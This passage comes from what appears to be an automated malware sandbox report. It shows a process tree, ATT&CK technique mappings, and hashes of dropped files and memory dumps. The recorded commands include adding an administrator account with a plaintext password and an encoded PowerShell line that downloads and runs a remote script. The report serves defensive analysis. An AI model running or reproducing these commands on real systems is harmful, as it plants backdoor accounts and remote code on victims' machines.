    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:2664

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc xaxH4MXO
1⤵
PID:5012
- C:\Windows\system32\net.exe
  net.exe user wgautilacc xaxH4MXO
  2⤵
  PID:1220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc xaxH4MXO
    3⤵
    PID:5036

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:3708
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:4372

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:624
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:112
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4592

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1028
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2944
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2384

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES5D33.tmp

Filesize
1KB

MD5
c143bb16df50c42076a32f018e3a48da

SHA1
d5968b33163e2e6d0d20e1c6aad69914f4f425b8

SHA256
e548c47ef66458c11315ef107065f041346c60847ead038081a6f7ea1b7691b1

SHA512
142618668b61ea2c9dae73a162c9b7317c0300f2dae81d1175ccffa7271d3dd7576993100205e61e0e3655e5a7c989eea72f160c60203acab62af179ff65d0c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3ghkhoty.qux.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\guvcm1e4\guvcm1e4.dll

Filesize
3KB

MD5
78bddf554a0db35bddf170c45f298134

SHA1
63bfdcf7a4e4fc42faf932b916b857d00648e5f5

SHA256
3d5456a447d52542fd1884383c46483ebaa4bd5b5a68deb15caa3a844593cb9a

SHA512
b2a022e826295e5c87776bf064f716d4edf73875e603a53915a586dc7129b27721421c3f0583b5aa9f34ec13e18669ed095e2ca86cef5cb2a92a5dbd6e27dcbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
78fc438bc0a10f68012273374fc242de

SHA1
1c2f8f958b4cfb2d822a50f97c1b503d039108d4

SHA256
14249168e782173812af05b444b582847646a69623a3254b8a590ba00365b4e0

SHA512
97d287f9e1ac939505e3ff2b7d6854ae838dd4f0cc3699d157912dcbb116b709b30580baac4c4ce7a5384e28de841dd44f12006c4857bc6a72bc8758427f280e

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
07044622ac01aea214d75af177a9976f

SHA1
8647e016414d4ef1da52abcf889210f15c58a640

SHA256
e83dc368abf546e72a528509e3d2fd8e83153f783832abcef014cddb9da002e9

SHA512
21b30facf460b9c93d32e1a54d6e5e2578f49c782eb3325268f83ad9beb14dd2c06b9b8337161099a69c1ad082583fdf94d20c7c4e2c91063e6bc0e6c9664324

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
7c2b6a91963747383e5cdb168539962c

SHA1
cd987c6f69702bf0369b4c49c898052fae21d513

SHA256
fc3c17833725d727590ef00fdf3f8d70f52d4c13a9cf52a77b6e74e22d7dae61

SHA512
8a952e2e7ac644cb73bc35f1d099f8c9590027f5e5f89771131025ce878c000fec1aeaf708113889e1044094ebbc311ee46f945cca6946860705edac4eec8141

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7EC5.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\System32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\guvcm1e4\CSC4142DEAC6D2F4A09B71EAC68D3D72F3B.TMP

Filesize
652B

MD5
2bd509c192ec5c268f8fadcd74095ce7

SHA1
3952657749078976a1b845513417e23150abc2ce

SHA256
2385a8b1fdbc1c2d4e4ed28914208fbe47176826dc0a8074de06b368182b46d2

SHA512
03e4ec772dcb9394764068d3f807023c38e685a277037e268ccffc137cb9ce511e7e2618b5511f563aaddc01cfcea2fea0a637998a3d848a3a7af77143ca3340

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\guvcm1e4\guvcm1e4.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\guvcm1e4\guvcm1e4.cmdline

Filesize
369B

MD5
9eaa5e046d464070448d87e09690885d

SHA1
556100f73d0bd702a4d483b51a3791304b52d9da

SHA256
a92a5ac80b041595e981ca6278952cf92d467f3c5e9c109ab8c1f62fdc0795f2

SHA512
e5d03b010a1438a9a53b349bd7843f6263e670261ea5c83c0a4138b14c8414bc122631faa484c1b3a09565494b51bc7de3d22220e98a1f32147e2385b3ffb3ff

Download Submit
memory/8-67-0x00007FF87C590000-0x00007FF87D051000-memory.dmp

Filesize
10.8MB

Download
memory/8-80-0x00007FF87C590000-0x00007FF87D051000-memory.dmp

Filesize
10.8MB

Download
memory/8-79-0x00000194A6130000-0x00000194A6140000-memory.dmp

Filesize
64KB

Download
memory/8-77-0x00000194A6130000-0x00000194A6140000-memory.dmp

Filesize
64KB

Download
memory/2256-50-0x00007FF87C590000-0x00007FF87D051000-memory.dmp

Filesize
10.8MB

Download
memory/2256-51-0x0000022C9FA60000-0x0000022C9FA70000-memory.dmp

Filesize
64KB

Download
memory/2256-52-0x0000022C9FA60000-0x0000022C9FA70000-memory.dmp

Filesize
64KB

Download
memory/2256-53-0x00007FF87C590000-0x00007FF87D051000-memory.dmp

Filesize
10.8MB

Download
memory/2384-152-0x00007FF87C590000-0x00007FF87D051000-memory.dmp

Filesize
10.8MB

Download
memory/2384-116-0x00007FF87C590000-0x00007FF87D051000-memory.dmp

Filesize
10.8MB

Download
memory/2664-65-0x000002801AA60000-0x000002801AA70000-memory.dmp

Filesize
64KB

Download
memory/2664-66-0x00007FF87C590000-0x00007FF87D051000-memory.dmp

Filesize
10.8MB

Download
memory/2664-63-0x00007FF87C590000-0x00007FF87D051000-memory.dmp

Filesize
10.8MB

Download
memory/2664-64-0x000002801AA60000-0x000002801AA70000-memory.dmp

Filesize
64KB

Download
memory/3136-2-0x000001E469F00000-0x000001E469F10000-memory.dmp

Filesize
64KB

Download
memory/3136-81-0x000001E469F00000-0x000001E469F10000-memory.dmp

Filesize
64KB

Download
memory/3136-1-0x00007FF87C590000-0x00007FF87D051000-memory.dmp

Filesize
10.8MB

Download
memory/3136-159-0x00007FF87C590000-0x00007FF87D051000-memory.dmp

Filesize
10.8MB

Download
memory/3136-102-0x000001E469F00000-0x000001E469F10000-memory.dmp

Filesize
64KB

Download
memory/3136-5-0x000001E469F00000-0x000001E469F10000-memory.dmp

Filesize
64KB

Download
memory/3136-78-0x00007FF87C590000-0x00007FF87D051000-memory.dmp

Filesize
10.8MB

Download
memory/3136-4-0x000001E469F00000-0x000001E469F10000-memory.dmp

Filesize
64KB

Download
memory/3136-0-0x000001E46A340000-0x000001E46A766000-memory.dmp

Filesize
4.1MB

Download
memory/3136-3-0x000001E469F00000-0x000001E469F10000-memory.dmp

Filesize
64KB

Download
memory/3136-83-0x000001E469F00000-0x000001E469F10000-memory.dmp

Filesize
64KB

Download
memory/3136-82-0x000001E469F00000-0x000001E469F10000-memory.dmp

Filesize
64KB

Download
memory/3456-84-0x00007FF88A6D0000-0x00007FF88A6E9000-memory.dmp

Filesize
100KB

Download
memory/3456-19-0x0000024E19810000-0x0000024E19820000-memory.dmp

Filesize
64KB

Download
memory/3456-20-0x0000024E19810000-0x0000024E19820000-memory.dmp

Filesize
64KB

Download
memory/3456-18-0x00007FF87C590000-0x00007FF87D051000-memory.dmp

Filesize
10.8MB

Download
memory/3456-35-0x0000024E197A0000-0x0000024E197A8000-memory.dmp

Filesize
32KB

Download
memory/3456-22-0x0000024E19810000-0x0000024E19820000-memory.dmp

Filesize
64KB

Download
memory/3456-103-0x00007FF87C590000-0x00007FF87D051000-memory.dmp

Filesize
10.8MB

Download
memory/3456-106-0x0000024E19810000-0x0000024E19820000-memory.dmp

Filesize
64KB

Download
memory/3456-40-0x0000024E80410000-0x0000024E8061A000-memory.dmp

Filesize
2.0MB

Download
memory/3456-117-0x0000024E19810000-0x0000024E19820000-memory.dmp

Filesize
64KB

Download
memory/3456-118-0x0000024E19810000-0x0000024E19820000-memory.dmp

Filesize
64KB

Download
memory/3456-39-0x0000024E80080000-0x0000024E801F6000-memory.dmp

Filesize
1.5MB

Download
memory/3456-149-0x0000024E19810000-0x0000024E19820000-memory.dmp

Filesize
64KB

Download
memory/3456-38-0x0000024E19810000-0x0000024E19820000-memory.dmp

Filesize
64KB

Download
memory/3456-156-0x00007FF87C590000-0x00007FF87D051000-memory.dmp

Filesize
10.8MB

Download
memory/3456-157-0x00007FF88A6D0000-0x00007FF88A6E9000-memory.dmp

Filesize
100KB

Download
memory/3456-17-0x0000024E7FB10000-0x0000024E7FB32000-memory.dmp

Filesize
136KB

Download